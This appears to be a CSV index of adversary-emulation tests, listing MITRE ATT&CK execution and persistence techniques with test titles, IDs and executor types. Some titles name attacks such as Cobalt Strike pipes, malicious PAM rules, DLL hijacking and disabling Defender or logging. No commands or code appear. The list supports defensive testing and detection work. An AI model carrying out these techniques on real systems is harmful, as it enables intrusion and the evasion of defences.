execution,T1059.001,Command and Scripting Interpreter: PowerShell,17,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
execution,T1059.001,Command and Scripting Interpreter: PowerShell,18,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,19,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,20,Abuse Nslookup with DNS Records,999bff6d-dc15-44c9-9f5c-e1051bfc86e1,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,21,SOAPHound - Dump BloodHound Data,6a5b2a50-d037-4879-bf01-43d4d6cbf73f,powershell
execution,T1059.001,Command and Scripting Interpreter: PowerShell,22,SOAPHound - Build Cache,4099086c-1470-4223-8085-8186e1ed5948,powershell
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
execution,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,3,Harvest SUID executable files,46274fc6-08a7-4956-861b-24cbbaa0503c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,4,LinEnum tool execution,a2b35a63-9df1-4806-9a4d-5fe0500845f2,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,5,New script file in the tmp directory,8cd1947b-4a54-41fb-b5ea-07d0ace04f81,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is running,7b38e5cc-47be-44f0-a425-390305c76c17,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,13,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Shell Creation using awk command,ee72b37d-b8f5-46a5-a9e7-0ff50035ffd5,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Creating shell using cpan command,bcd4c2bc-490b-4f91-bd31-3709fe75bbdf,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,16,Shell Creation using busybox command,ab4d04af-68dc-4fee-9c16-6545265b3276,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,17,emacs spawning an interactive system shell,e0742e38-6efe-4dd4-ba5c-2078095b6156,sh
execution,T1559,Inter-Process Communication,1,Cobalt Strike Artifact Kit pipe,bd13b9fc-b758-496a-b81a-397462f82c72,command_prompt
execution,T1559,Inter-Process Communication,2,Cobalt Strike Lateral Movement (psexec_psh) pipe,830c8b6c-7a70-4f40-b975-8bbe74558acd,command_prompt
execution,T1559,Inter-Process Communication,3,Cobalt Strike SSH (postex_ssh) pipe,d1f72fa0-5bc2-4b4b-bd1e-43b6e8cfb2e6,command_prompt
execution,T1559,Inter-Process Communication,4,Cobalt Strike post-exploitation pipe (4.2 and later),7a48f482-246f-4aeb-9837-21c271ebf244,command_prompt
execution,T1559,Inter-Process Communication,5,Cobalt Strike post-exploitation pipe (before 4.2),8dbfc15c-527b-4ab0-a272-019f469d367f,command_prompt
execution,T1204.003,User Execution: Malicious Image,1,Malicious Execution from Mounted ISO Image,e9795c8d-42aa-4ed4-ad80-551ed793d006,powershell
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,5,Command Prompt read contents from CMD file and execute,df81db1b-066c-4802-9bc8-b6d030c3ba8e,command_prompt
execution,T1059.003,Command and Scripting Interpreter: Windows Command Shell,6,Command prompt writing script to file then executes it,00682c9f-7df4-4df8-950b-6dcaaa3ad9af,command_prompt
execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.005,Command and Scripting Interpreter: Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
execution,T1569.002,System Services: Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,System Services: Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1569.002,System Services: Service Execution,3,psexec.py (Impacket),edbcd8c9-3639-4844-afad-455c91e95a35,bash
execution,T1569.002,System Services: Service Execution,4,BlackCat pre-encryption cmds with Lateral Movement,31eb7828-97d7-4067-9c1e-c6feb85edc4b,powershell
execution,T1569.002,System Services: Service Execution,5,Use RemCom to execute a command on a remote host,a5d8cdeb-be90-43a9-8b26-cc618deac1e0,command_prompt
execution,T1569.002,System Services: Service Execution,6,Snake Malware Service Create,b8db787e-dbea-493c-96cb-9272296ddc49,command_prompt
execution,T1569.002,System Services: Service Execution,7,Modifying ACL of Service Control Manager via SDET,bf07f520-3909-4ef5-aa22-877a50f2f77b,command_prompt
execution,T1569.002,System Services: Service Execution,8,Pipe Creation - PsExec Tool Execution From Suspicious Locations,004a5d68-627b-452d-af3d-43bd1fc75a3b,powershell
execution,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job via kubectl in a Pod,9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213,bash
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,8,Import XML Schedule Task with Hidden Attribute,cd925593-fbb4-486d-8def-16cbdf944bf4,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A Scheduled Task,dda6fc7b-c9a6-4c18-b98d-95ec6542af6d,powershell
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,10,"Scheduled Task (""Ghost Task"") via Registry Key Manipulation",704333ca-cc12-4bcf-9916-101844881f54,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,11,Scheduled Task Persistence via CompMgmt.msc,8fcfa3d5-ea7d-4e1c-bd3e-3c4ed315b7d2,command_prompt
persistence,T1053.005,Scheduled Task/Job: Scheduled Task,12,Scheduled Task Persistence via Eventviewer.msc,02124c37-767e-4b76-9383-c9fc366d9d4c,command_prompt
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
persistence,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,2,Driver Installation Using pnputil.exe,5cb0b071-8a5a-412f-839d-116beb2ed9f7,powershell
persistence,T1547,Boot or Logon Autostart Execution,3,Leverage Virtual Channels to execute custom DLL during successful RDP session,fdd45306-74f6-4ade-9a97-0a4895961228,command_prompt
persistence,T1547.014,Active Setup,1,HKLM - Add atomic_test key to launch executable as part of user setup,deff4586-0517-49c2-981d-bbea24d48d71,powershell
persistence,T1547.014,Active Setup,2,HKLM - Add malicious StubPath value to existing Active Setup Entry,39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a,powershell
persistence,T1547.014,Active Setup,3,HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number,04d55cef-f283-40ba-ae2a-316bc3b5e78c,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,1,Modify Fax service to run PowerShell,ed366cde-7d12-49df-a833-671904770b9f,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,2,Service Installation CMD,981e2942-e433-44e9-afc1-8c957a1496b6,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,3,Service Installation PowerShell,491a4af6-a521-4b74-b23b-f7b3f1ee9e77,powershell
persistence,T1543.003,Create or Modify System Process: Windows Service,4,TinyTurla backdoor service w64time,ef0581fd-528e-4662-87bc-4c2affb86940,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,5,Remote Service Installation CMD,fb4151a2-db33-4f8c-b7f8-78ea8790f961,command_prompt
persistence,T1543.003,Create or Modify System Process: Windows Service,6,Modify Service to Run Arbitrary Binary (Powershell),1f896ce4-8070-4959-8a25-2658856a70c9,powershell
persistence,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
persistence,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
persistence,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,1,Azure AD - Add Company Administrator Role to a user,4d77f913-56f5-4a14-b4b1-bf7bb24298ad,powershell
persistence,T1098.003,Account Manipulation: Additional Cloud Roles,2,Simulate - Post BEC persistence via user password reset followed by user added to company administrator role,14f3af20-61f1-45b8-ad31-4637815f3f44,powershell
persistence,T1547.012,Boot or Logon Autostart Execution: Print Processors,1,Print Processors,f7d38f47-c61b-47cc-a59d-fc0368f47ed0,powershell
persistence,T1574.001,Hijack Execution Flow: DLL,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL,2,Phantom Dll Hijacking - WinAppXRT.dll,46ed938b-c617-429a-88dc-d49b5c9ffedb,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL,3,Phantom Dll Hijacking - ualapi.dll,5898902d-c5ad-479a-8545-6f5ab3cfc87f,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL,4,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL,5,DLL Side-Loading using the dotnet startup hook environment variable,d322cdd7-7d60-46e3-9111-648848da7c02,command_prompt
persistence,T1574.001,Hijack Execution Flow: DLL,6,"DLL Search Order Hijacking,DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE",c095ad8e-4469-4d33-be9d-6f6d1fb21585,powershell
persistence,T1137.006,Office Application Startup: Add-ins,1,Code Executed Via Excel Add-in File (XLL),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1137.006,Office Application Startup: Add-ins,2,Persistent Code Execution Via Excel Add-in File (XLL),9c307886-9fef-41d5-b344-073a0f5b2f5f,powershell
persistence,T1137.006,Office Application Startup: Add-ins,3,Persistent Code Execution Via Word Add-in File (WLL),95408a99-4fa7-4cd6-a7ef-cb65f86351cf,powershell
persistence,T1137.006,Office Application Startup: Add-ins,4,Persistent Code Execution Via Excel VBA Add-in File (XLAM),082141ed-b048-4c86-99c7-2b8da5b5bf48,powershell
persistence,T1137.006,Office Application Startup: Add-ins,5,Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM),f89e58f9-2b49-423b-ac95-1f3e7cfd8277,powershell
persistence,T1505.002,Server Software Component: Transport Agent,1,Install MS Exchange Transport Agent Persistence,43e92449-ff60-46e9-83a3-1a38089df94d,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1556.002,Modify Authentication Process: Password Filter DLL,2,Install Additional Authentication Packages,91580da6-bc6e-431b-8b88-ac77180005f2,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,1,Simulate Patching termsrv.dll,0b2eadeb-4a64-4449-9d43-3d999f4a317b,powershell
persistence,T1505.005,Server Software Component: Terminal Services DLL,2,Modify Terminal Services DLL Path,18136e38-0530-49b2-b309-eed173787471,powershell
persistence,T1176,Browser Extensions,1,Chrome/Chromium (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome/Chromium (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1547.010,Boot or Logon Autostart Execution: Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1037.002,Boot or Logon Initialization Scripts: Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
persistence,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
persistence,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,2,Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support Provider configuration in registry,de3f8e74-3351-4fdb-a442-265dbf231738,powershell
persistence,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
persistence,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
persistence,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
persistence,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
persistence,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
persistence,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
persistence,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
persistence,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
persistence,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
persistence,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
persistence,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
persistence,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
persistence,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
persistence,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
persistence,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
persistence,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
persistence,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
persistence,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
persistence,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
persistence,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
persistence,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
persistence,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
persistence,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
persistence,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
persistence,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
persistence,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
persistence,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
persistence,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
persistence,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
persistence,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
persistence,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
persistence,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
persistence,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
persistence,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
persistence,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
persistence,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
persistence,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
persistence,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
persistence,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
persistence,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
persistence,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
persistence,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
persistence,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
persistence,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
persistence,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
persistence,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
persistence,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
persistence,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
persistence,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
persistence,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
persistence,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
persistence,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
persistence,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
persistence,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
persistence,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
persistence,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
persistence,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
persistence,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
persistence,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
persistence,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
persistence,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
persistence,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
persistence,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
persistence,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
persistence,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
persistence,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
persistence,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
persistence,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
persistence,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
persistence,T1112,Modify Registry,70,Enable RDP via Registry (fDenyTSConnections),16bdbe52-371c-4ccf-b708-79fba61f1db4,command_prompt
persistence,T1112,Modify Registry,71,Disable Windows Prefetch Through Registry,7979dd41-2045-48b2-a54e-b1bc2415c9da,command_prompt
persistence,T1112,Modify Registry,72,Setting Shadow key in Registry for RDP Shadowing,ac494fe5-81a4-4897-af42-e774cf005ecb,powershell
persistence,T1112,Modify Registry,73,Flush Shimcache,ecbd533e-b45d-4239-aeff-b857c6f6d68b,command_prompt
persistence,T1112,Modify Registry,74,Disable Windows Remote Desktop Protocol,5f8e36de-37ca-455e-b054-a2584f043c06,command_prompt
